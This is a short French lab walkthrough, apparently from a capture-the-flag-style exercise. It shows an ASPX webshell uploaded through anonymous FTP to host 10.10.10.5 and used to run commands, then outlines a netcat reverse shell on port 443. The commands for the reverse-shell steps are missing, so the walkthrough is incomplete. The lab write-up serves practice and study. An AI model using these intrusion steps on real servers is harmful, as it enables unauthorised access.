FTP - Reverse Shell (Webshell) Attack

Exploitation - Reverse Shell via FTP

Upload d’une Webshell ASPX

Nous utilisons une webshell préexistante, cmd.aspx, provenant de SecLists :

locate cmd.aspx
cp /usr/share/davtest/backdoors/aspx_cmd.aspx .

Ensuite, nous l’importons sur le serveur FTP :

ftp 10.10.10.5
anonymous
put aspx_cmd.aspx

Nous accédons à la webshell via le serveur HTTP et exécutons des commandes, par exemple :

ipconfig

Upload du binaire nc.exe pour un reverse shell

Nous téléchargeons nc.exe depuis SecLists :

Puis, nous l’ajoutons sur le serveur FTP :

À partir de la webshell, nous localisons le fichier nc.exe sur le serveur cible:

Mise en place du reverse shell

Écoute sur le port 443 :

Nous avons mis en place un listener avec nc pour écouter sur le port 443 :

Depuis la machine cible, nous exécutons la commande suivante via la webshell :

Mis à jour

Ce contenu vous a-t-il été utile ?